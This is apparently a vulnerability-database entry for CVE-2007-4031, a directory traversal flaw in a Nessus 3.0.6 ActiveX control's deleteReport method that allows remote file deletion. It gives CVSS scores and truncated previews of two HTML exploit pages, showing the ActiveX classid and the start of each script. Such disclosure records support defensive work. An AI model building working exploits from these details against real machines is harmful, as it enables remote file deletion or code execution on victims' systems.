7.8
CVSSv2

CVE-2007-4031

Published: 27/07/2007 Updated: 29/09/2017
CVSS v2 Base Score: 7.8 | Impact Score: 7.8 | Exploitability Score: 8.6
VMScore: 790
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:C

Vulnerability Summary

Directory traversal vulnerability in a certain ActiveX control in Nessus Vulnerability Scanner 3.0.6 allows remote malicious users to delete arbitrary files via a .. (dot dot) in the argument to the deleteReport method, probably related to the SCANCTRL.ScanCtrlCtrl.1 ActiveX control in scan.dll.

Vulnerable Product Search on Vulmon Subscribe to Product

nessus vulnerability scanner 3.0.6

Exploits

<HTML> <!-- Nessus Vulnerability Scanner 306 ActiveX 0day Remote Code Execution Exploit Bug discovered by Krystian Kloskowski (h07) <h07@interiapl> Tested on Nessus 306 / IE 6 / XP SP2 Polish Just for fun ;] --> <object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object> <script language=" ...
<HTML> <!-- Nessus Vulnerability Scanner 306 ActiveX deleteReport() 0day Remote Delete File Exploit Bug discovered by Krystian Kloskowski (h07) <h07@interiapl> Tested on Nessus 306 / IE 6 / XP SP2 Polish Just for fun ;] --> <object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object> <scrip ...